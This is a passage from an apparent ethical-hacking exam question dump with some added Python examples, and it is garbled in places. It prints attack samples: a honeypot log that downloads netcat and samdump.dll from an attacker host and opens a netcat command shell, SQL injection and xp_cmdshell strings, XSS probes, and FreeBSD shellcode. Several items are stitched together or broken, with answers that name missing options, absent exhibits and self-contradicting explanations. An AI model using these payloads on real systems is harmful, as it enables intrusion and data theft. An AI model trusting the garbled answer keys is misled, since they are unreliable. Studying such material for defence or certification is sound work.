Explanation: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
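Added example serving both the search-box scenario in QUESTION 279 and the alert() probe in QUESTION 291 (example code, not from the exam): three Python renderers of a search results page. The first reflects the term raw, the second encodes it for HTML text only, and the third uses html.escape(quote=True) so the value attribute of the text box is covered as well. The probe strings are constructed; the second one shows why encoding for the text context alone is not enough when the same value is also placed inside an attribute.

```python
import html

# Constructed probes: the alert() string from QUESTION 291, and one that closes
# the value="" attribute and adds an event handler instead of injecting a tag.
PROBE_TEXT = "<script>alert('Testing Testing Testing')</script>"
PROBE_ATTR = '" onfocus="alert(1)" autofocus="'

PAGE = '<p>Results for %s</p>\n<input type="text" name="q" value="%s">'

def render_vulnerable(query):
    """Reflects the search term into both text and attribute unencoded."""
    return PAGE % (query, query)

def render_text_only(query):
    """Encodes < > & but leaves quotes alone: the text context is fixed,
    the attribute context is still open to a quote-and-handler payload."""
    enc = html.escape(query, quote=False)
    return PAGE % (enc, enc)

def render_safe(query):
    """quote=True also turns double and single quotes into entities, so the
    attribute cannot be closed early; this covers both contexts used here."""
    enc = html.escape(query, quote=True)
    return PAGE % (enc, enc)

def reflects_markup(page, marker):
    """What a tester checks: does the injected markup come back intact?"""
    return marker in page

if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("text-only", render_text_only),
                         ("safe", render_safe)):
        print(name, "tag probe reflected:", reflects_markup(render(PROBE_TEXT), "<script>"),
              "| attribute probe reflected:", reflects_markup(render(PROBE_ATTR), 'onfocus="alert(1)"'))
```

html.escape handles HTML text and quoted attribute values only; a value placed inside a script block, a URL or an unquoted attribute needs the encoding for that context, which is why template engines with context-aware auto-escaping are preferred over hand-placed escape calls.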
QUESTION 292:
Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have used printf("%s", str). What attack will his program expose the web application to?
A. Cross Site Scripting
B. SQL injection Attack
C. Format String Attack
D. Unicode Traversal Attack
Answer: C
Explanation: Format string attacks are a class of software vulnerability first publicized around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write the number of bytes formatted so far into the corresponding argument, assuming that argument exists and is of type int *.

QUESTION 293:
Jane has just accessed her preferred e-commerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed?
A. An integer variable
B. A 'hidden' price value
C. A 'hidden' form field value
D. A page cannot be changed locally; it can only be served by a web server
Answer: C
Explanation: Changing hidden form values is possible when a web site is poorly built and trusts the visitor's computer to submit vital data, such as the price of a product, to the database.
QUESTION 294:
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below. Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
What attack is being depicted here?
A. Cookie Stealing
B. Session Hijacking
C. Cross Site Scripting
D. Parameter Manipulation
Answer: D
Explanation: Cookies are the preferred method to maintain state in the stateless
HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any malicious user can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.
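Added example (not from the exam): since the client can rewrite anything it stores, a server that must keep a flag such as ADMIN in a cookie can at least make it tamper-evident by appending an HMAC over the cookie body and refusing any cookie whose tag does not verify. The secret and field values below are constructed; the alteration replayed in the test is the one from the question.

```python
import base64
import hashlib
import hmac

# Constructed server-side key. A real deployment loads it from configuration or a
# KMS and rotates it; it must never reach the client, or the client can re-sign.
SERVER_SECRET = b"example-only-rotate-me"

def _sig(payload):
    """Base64url HMAC-SHA256 over exactly the bytes the client will send back."""
    mac = hmac.new(SERVER_SECRET, payload.encode("utf-8"), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode("ascii").rstrip("=")

def issue_cookie(fields):
    """Serialize the fields in the page's 'k=v; k=v' style and append the tag."""
    payload = "; ".join("%s=%s" % (k, v) for k, v in fields.items())
    return "%s; sig=%s" % (payload, _sig(payload))

def read_cookie(cookie):
    """Return the fields only if the tag verifies; None for a missing or bad tag.
    compare_digest keeps the comparison constant-time."""
    payload, sep, sig = cookie.rpartition("; sig=")
    if not sep:
        return None
    if not hmac.compare_digest(_sig(payload), sig):
        return None
    return dict(item.split("=", 1) for item in payload.split("; "))

if __name__ == "__main__":
    issued = issue_cookie({"lang": "en-us", "ADMIN": "no", "y": "1", "time": "10:30GMT"})
    print("issued :", issued)
    print("accepted:", read_cookie(issued))
    edited = issued.replace("ADMIN=no", "ADMIN=yes").replace("10:30GMT", "12:30GMT")
    print("edited  :", edited)
    print("accepted:", read_cookie(edited))
```

Signing stops silent edits of the kind shown in the question, but it does not hide the contents, stop replay of an old signed value, or remove the need for the Secure and HttpOnly flags; keeping authorization state server-side and storing only an opaque session identifier in the cookie avoids the problem altogether.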
QUESTION 295:
_____ ensures that the enforcement of organizational security policy does not rely on voluntary web application user compliance. It secures information by assigning sensitivity labels to information and comparing these to the level of security a user is operating at.
A. Mandatory Access Control
B. Authorized Access Control
C. Role-based Access Control
D. Discretionary Access Control
Answer: A
Explanation: In computer security, mandatory access control (MAC) is a kind of access control, defined by the TCSEC as "a means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity."
QUESTION 296:
Say that "abigcompany.com" had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to go back and see the code for that error? Select the best answer.
A. archive.org
B. There is no way to get the changed webpage unless you contact someone at the company
C. Usenet
D. Javascript would not be in their html so a service like usenet or archive wouldn't help you
Answer: A
Explanation:
Archive.org is a website that periodically archives internet content. They have archives of websites over many years. It could be used to go back and look at the javascript as javascript would be in the HTML code.
QUESTION 297:
Which of the following is the best way an attacker can passively learn about technologies used in an organization?
A. By sending web bugs to key personnel
B. By webcrawling the organization web site
C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization
D. By performing a port scan on the organization's web site
Answer: C
Note: Sending web bugs, crawling the site and port scanning all touch the target and are considered "active"; the question asks for "passive".
QUESTION 298:
You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?
A. 5 minutes
B. 23 days
C. 200 years
D. 16 million years
Answer: A
Explanation: A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password. As long as you use a word found in or similar to a word found in a dictionary the password is considered to be weak.
QUESTION 299:
Which of the following is most effective against passwords?
A. Dictionary Attack
B. BruteForce attack
C. Targeted Attack
D. Manual password Attack
Answer: B
Explanation:
The most effective means of password attack is brute force: the program attempts every possible combination of characters. While this takes longer than a dictionary attack, which uses a text file of real words, it is always capable of breaking the password given enough time.
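Added example covering QUESTION 298 and QUESTION 299 (not from the exam): a dictionary attack against an unsalted SHA-256 hash, a small rule-based mangler for "similar to a dictionary word" passwords, and a keyspace estimate that shows why a 22-character dictionary word falls in a handful of guesses while a 22-character random string would not. The wordlist, the guess rate and the hash function are constructed for illustration.

```python
import hashlib

# Constructed wordlist; "counterrevolutionaries" is a 22-character dictionary word.
WORDLIST = ["password", "letmein", "counterrevolutionaries", "sunshine", "dragon"]

def sha256_hex(candidate):
    """Stand-in for the system's one-way hash; unsalted on purpose to keep the demo short."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()

def mangle(words):
    """Common rule-based variants: the 'similar to a dictionary word' case."""
    seen, out = set(), []
    for w in words:
        for cand in (w, w.capitalize(), w.upper(), w + "1", w + "123", w.capitalize() + "1"):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out

def dictionary_attack(target_hash, candidates, hash_fn=sha256_hex):
    """Hash each candidate and compare; returns (password or None, guesses made)."""
    guesses = 0
    for cand in candidates:
        guesses += 1
        if hash_fn(cand) == target_hash:
            return cand, guesses
    return None, guesses

def brute_force_years(length, alphabet_size, guesses_per_second):
    """Worst-case time to exhaust an alphabet**length keyspace at a given rate."""
    return alphabet_size ** length / guesses_per_second / (365 * 24 * 3600)

if __name__ == "__main__":
    target = sha256_hex("counterrevolutionaries")
    print("plain word   :", dictionary_attack(target, WORDLIST))
    target = sha256_hex("Counterrevolutionaries1")
    print("unmangled    :", dictionary_attack(target, WORDLIST))
    print("with rules   :", dictionary_attack(target, mangle(WORDLIST)))
    print("22 random a-z at 1e9/s: %.1e years" % brute_force_years(22, 26, 1e9))
    print("8 random a-z at 1e9/s : %.1e years" % brute_force_years(8, 26, 1e9))
```

The third guess recovers the 22-character word whatever its length; length only helps when the characters are not predictable from a list. Real password stores should use a salted, deliberately slow hash (bcrypt, scrypt or Argon2), which does not defeat a dictionary attack on a weak password but does cut the guesses per second by orders of magnitude.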
QUESTION 300:
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands
(such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k.
B. There are two attackers on the system - johna2k and haxedj00.
C. The attack is a remote exploit and the hacker downloads three files.
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
Answer: C
QUESTION 301:
Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu.
The bank has deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser.
John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet-enabled banking application. Strangely, the account balances of many of the bank's customers had been changed! However, money had not been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:
Attempted login of unknown user: John
Attempted login of unknown user: sysaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete '';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x90627579944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike
What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer)
A. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID.
B. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.
C. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools.
D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.
Answer: A
Explanation: The following part:
Attempted login of unknown user: pete '';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
clearly shows a hacker trying to perform SQL injection: first bypassing the login with the always-true condition 1=1, then attempting to drop the logins table.
QUESTION 302:
Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit.
Choose the attack type from the choices given below.
A. Database Fingerprinting
B. Database Enumeration
C. SQL Fingerprinting
D. SQL Enumeration
Answer: A
Explanation: He is trying to build a picture of the characteristics of the target database; he is taking its fingerprints.
QUESTION 303:

Bob has been hired to do a web application security test. Bob notices that the site is dynamic and infers that they must be making use of a database at the application back end. Bob wants to validate whether SQL Injection would be possible.
What is the first character that Bob should use to attempt breaking valid SQL requests?
A. Semicolon
B. Double Quote
C. Single Quote
D. Exclamation Mark
Answer: C
Explanation: In SQL, single quotes delimit string values in queries. By entering an extra single quote, Bob tests whether the application passes it through into the query unescaped, which will most likely make the database return an error.
QUESTION 304:
Exhibit:
You are conducting a pen-test against a company's website using SQL Injection techniques. You enter "anything' or 1=1--" in the username field of an authentication form. This is the output returned from the server.
What is the next step you should do?
A. Identify the user context of the web application by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'
B. Identify the database and table name by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109
C. Format the C: drive and delete the database by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'format c: /q /yes '; drop database myDB; --
D. Reboot the web server by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'; --
Answer: A
QUESTION 305:
Your boss Certkiller is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack?
A. SQL Input attack
B. SQL Piggybacking attack
C. SQL Select attack
D. SQL Injection attack
Answer: D
Explanation: This technique is known as a SQL injection attack.
QUESTION 306:
Which of the following activities will not be considered passive footprinting?
A. Scan the range of IP address found in the target DNS database
B. Perform multiples queries using a search engine
Answer: C
Explanation: Scanning is not considered to be passive footprinting.
QUESTION 307:
When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? (Choose the best answer)
A. Cover his tracks by eradicating the log files and audit trails.
B. Gain access to the remote computer in order to conceal the venue of attacks.
C. Perform a reconnaissance of the remote target for identification of venues of attack.
D. Always begin with a scan in order to quickly identify venue of attacks.
Answer: C
Explanation: A hacker always starts with a preparatory phase (Reconnaissance) where he seeks to gather as much information as possible about the target of evaluation prior to launching an attack. The reconnaissance can be either passive or active (or both).
QUESTION 308:
Central Frost Bank was a medium-sized, regional financial institution in New York. The bank recently deployed a new Internet-accessible Web application. Using this application, Central Frost's customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business through a Web browser. John Stevens was in charge of information security at Central Frost Bank. After one month in production, the Internet banking application was the subject of several customer complaints. Mysteriously, the account balances of many of Central Frost's customers had been changed! However, money hadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:
Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike
What type of attack did the Hacker attempt?
A. Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools.
B. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.
C. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID.
D. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.
Answer: C
Explanation:
The 1=1 or drop table logins are attempts at SQL injection.
QUESTION 309:
A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database?
A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database
B. An attacker submits user input that executes an operating system command to compromise a target system
C. An attacker gains control of a system to flood the target system with requests, preventing legitimate users from gaining access
D. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database
Answer: A
Explanation: Using the poorly designed input validation to alter or steal data from a database is a SQL injection attack.
QUESTION 310:
Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database?
A. Jimmy can submit user input that executes an operating system command to compromise a target system
B. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system
C. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database
D. Jimmy can gain control of a system to flood the target system with requests, preventing legitimate users from gaining access
Answer: B
Explanation: SQL injection is a security vulnerability that occurs in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
QUESTION 311:
Identify SQL injection attack from the HTTP requests shown below:
A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
B. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
C. http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx
D. http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2f
3e%3c%2fscript%3e
Answer: C
Explanation: The correct answer contains the code to alter the usertable in order to change the password for user smith to hAx0r.
QUESTION 312:
What is the problem with this ASP script (login.asp)?

/tmp/x;
/usr/sbin/inetd -s /tmp/x; sleep 10;
/bin/ rm -f /tmp/x AAAA...AAA
In the above exploit code, the command "/bin/sh sh -i" is given.
What is the purpose, and why is 'sh' shown twice?
A. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file.
B. The length of such a buffer overflow exploit makes it prohibitive for user to enter manually. The second 'sh' automates this function.
C. It checks for the presence of a codeword (setting the environment variable) among the environment variables.
D. It is a giveaway by the attacker that he is a script kiddy.
Answer: A
Explanation:
What's going on in the above question is that the attacker is trying to write to the unix file /tmp/x (his inetd.conf replacement config). He is attempting to add a service called ingresslock (which doesn't exist), which is "apparently" supposed to spawn a shell on the port specified by /etc/services for the service "ingresslock". Since ingresslock is a non-existent service, if an attempt were made to respawn inetd, the service would error out on that line (he would have to add the service to /etc/services to suppress the error). Now the question is asking about /bin/sh sh -i, which produces an error that should read "sh: /bin/sh: cannot execute binary file"; the -i option places the shell in interactive mode and cannot be used to respawn itself.
QUESTION 427:
You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious to perform extended functions. On further research you come across a perl script that runs the following msadc functions:

What kind of exploit is indicated by this script?
A. A buffer overflow exploit.
B. A SUID exploit.
C. A SQL injection exploit.
D. A chained exploit.
E. A buffer under run exploit.
Answer: D
QUESTION 428:
The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds.
What kind of attack is this program susceptible to?
A. Buffer Overflow
B. Denial of Service
C. Shatter Attack
D. Password Attack
Answer: A
Explanation: C users must avoid using dangerous functions that do not check bounds unless they've ensured that the bounds will never get exceeded. A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries (usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program.
QUESTION 429:
Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy and integrity and enable strong authentication, but it can't mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns?
A. Bob can explain that using a weak key management technique is a form of programming error
B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error
C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique
D. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error
Answer: C
Explanation: In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a possible breach of system security.
QUESTION 430:
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold.
What is the most common cause of buffer overflow in software today?
A. Bad permissions on files.
B. High bandwidth and large number of users.
C. Usage of non standard programming languages.
D. Bad quality assurance on software produced.
Answer: D
Explanation: Technically, a buffer overflow is a problem with the program's internal implementation.
QUESTION 431:
While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is called 'file.txt' but when he opens it, he finds the following:

What does this file contain?
A. A picture that has been renamed with a .txt extension.
B. An encrypted file.
C. A uuencoded file.
D. A buffer overflow.
Answer: D
Explanation: This is a buffer overflow exploit with its "payload" in hexadecimal format.
QUESTION 432:
Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The programmer makes an assumption that 200 characters are more than enough. Because there were no proper boundary checks being conducted, Bob decided to insert 400 characters into the 200-character buffer. (Overflows the buffer). Below is the code snippet.

How can you protect/fix the problem of your application as shown above?
A. Because the counter starts with 0, we would stop when the counter is less than 200
B. Because the counter starts with 0, we would stop when the counter is more than 200
C. Add a separate statement to signify that if we have written 200 characters to the buffer, the stack should stop because it can't hold any more data
D. Add a separate statement to signify that if we have written less than 200 characters to the buffer, the stack should stop because it can't hold any more data
Answer: A,C
Explanation: I=199 would be character number 200. The stack holds exactly 200 characters, so there is no need to stop before 200.
QUESTION 433:
#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)>>8), (((x)&0xff0000)>>16), (((x)&0xff000000)>>24)
char infin_loop[]=
/* for testing purposes */
"\xEB\xFE";
char bsdcode[] =
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
char *target=NULL, *username="user", *password=NULL;
struct targets getit;
The following exploit code is extracted from what kind of attack?
A. Remote password cracking attack
B. SQL Injection
C. Distributed Denial of Service
D. Cross Site Scripting
E. Buffer Overflow
Answer: E
Explanation: This is a buffer overflow with its payload in hex format.
QUESTION 434:
StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and
Microsoft's /GS option use _____ defense against buffer overflow attacks.
A. Canary
B. Hex editing
C. Format checking
D. Non-executing stack
Answer: A
Explanation: Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making the overflow evident. This is a reference to the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system.
QUESTION 435:
A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog and then halts, what does it indicate?
A. The system has crashed
B. A buffer overflow attack has been attempted
C. A buffer overflow attack has already occurred
D. A firewall has been breached and this is logged
E. An intrusion detection system has been triggered
Answer: B
Explanation: Terminator Canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction to this observation is that the canaries are built of NULL terminators, CR, LF, and -1. The undesirable result is that the canary is known.
QUESTION 436:
Choose one of the following pseudo codes to describe this statement:
If we have written 200 characters to the buffer variable, the stack should stop because it cannot hold any more data.
A. If (I > 200) then exit (1)
B. If (I < 200) then exit (1)
C. If (I = 200) then exit (1)
Answer: D
QUESTION 437:
Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic.
She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would like to tunnel the information to the remote end but does not have VPN capabilities to do so.
Which of the following tools can she use to protect the link?
A. MD5
B. SSH
C. RSA
D. PGP
Answer: B
Explanation: Port forwarding, or tunneling, is a way to forward otherwise insecure TCP traffic through SSH Secure Shell. You can secure for example POP3, SMTP and HTTP connections that would otherwise be insecure.
QUESTION 438:
An attacker runs netcat tool to transfer a secret file between two hosts.
Machine A: netcat -l -p 1234 < secretfile
Machine B: netcat 192.168.3.4 > 1234
He is worried about information being sniffed on the network.
How would the attacker use netcat to encrypt information before transmitting it on the wire?
A. Machine A: netcat -l -p -s password 1234 < testfile
Machine B: netcat 1234
B. Machine A: netcat -l -e magickey -p 1234 < testfile
Machine B: netcat 1234
C. Machine A: netcat -l -p 1234 < testfile -pw password
Machine B: netcat 1234 -pw password
D. Use cryptcat instead of netcat.
Answer: D
Explanation:
Cryptcat is the standard netcat enhanced with Twofish encryption, with ports for Windows NT, BSD and Linux. Twofish is courtesy of Counterpane and Cryptix. A default netcat installation does not contain any cryptography support.
QUESTION 439:
Symmetric encryption algorithms are known to be fast but present great challenges on the key management side. Asymmetric encryption algorithms are slow but allow communication with a remote host without having to transfer a key out of band or in person. If we combine the strength of both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data and then use the asymmetric encryption system to encrypt the symmetric key, what would this type of usage be known as?
A. Symmetric system
B. Combined system
C. Hybrid system
D. Asymmetric system
Answer: C
Explanation: Because of the complexity of the underlying problems, most public-key algorithms involve operations such as modular multiplication and exponentiation, which are much more computationally expensive than the techniques used in most block ciphers, especially with typical key sizes. As a result, public-key cryptosystems are commonly "hybrid" systems, in which a fast symmetric-key encryption algorithm is used for the message itself, while the relevant symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, hybrid signature schemes are often used, in which a cryptographic hash function is computed, and only the resulting hash is digitally signed.
QUESTION 440:
Steven the hacker realizes that the network administrator of Certkiller is using syskey to protect organization resources in the Windows 2000 Server. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only the first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2000 Server machine in an attempt to crack the hash used by Syskey. He needs to configure the encryption level before he can launch the attack.
How many bits does Syskey use for encryption?
A. 40 bit
B. 64 bit
C. 256 bit
D. 128 bit
Answer: D
Explanation: SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.
QUESTION 441:
In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory and uses it to encrypt the message before sending it off. Bob then uses his private key to decrypt the message and reads it. No one listening in can decrypt the message.
Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to?
A. Irreversibility
B. Non-repudiation
C. Symmetry
D. Asymmetry
Answer: D
Explanation: PKI uses asymmetric key pair encryption. One key of the pair is the only way to decrypt data encrypted with the other.
QUESTION 442:
What is SYSKEY # of bits used for encryption?
A. 40
B. 64
C. 128
D. 256
Answer: C
Explanation:
System Key hotfix is an optional feature which allows stronger encryption of SAM.
Strong encryption protects private account information by encrypting the password data using a 128-bit cryptographically random key, known as a password encryption key.
QUESTION 443:
Which of the following is NOT true of cryptography?
A. Science of protecting information by encoding it into an unreadable format
B. Method of storing and transmitting data in a form that only those it is intended for can read and process
C. Most (if not all) algorithms can be broken by both technical and non-technical means
D. An effective way of protecting sensitive information in storage but not in transit
Answer: D
Explanation: Cryptography will protect data in both storage and in transit.
QUESTION 444:
Which of the following best describes session key creation in SSL?
A. It is created by the server after verifying the user's identity
B. It is created by the server upon connection by the client
C. It is created by the client from the server's public key
D. It is created by the client after verifying the server's identity
Answer: D
Explanation: An SSL session always begins with an exchange of messages called the SSL handshake. The handshake allows the server to authenticate itself to the client using public-key techniques, then allows the client and the server to cooperate in the creation of symmetric keys used for rapid encryption, decryption, and tamper detection during the session that follows. Optionally, the handshake also allows the client to authenticate itself to the server.
QUESTION 445:
Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible?
A. Any cookie can be replayed irrespective of the session status
B. The scenario is invalid as a secure cookie cannot be replayed
C. It works because encryption is performed at the network layer (layer 1 encryption)
D. It works because encryption is performed at the application layer (single encryption key)
Answer: D
QUESTION 446:
How many bits encryption does SHA-1 use?
A. 64 bits
B. 128 bits
C. 160 bits
D. 256 bits
Answer: C
Explanation:
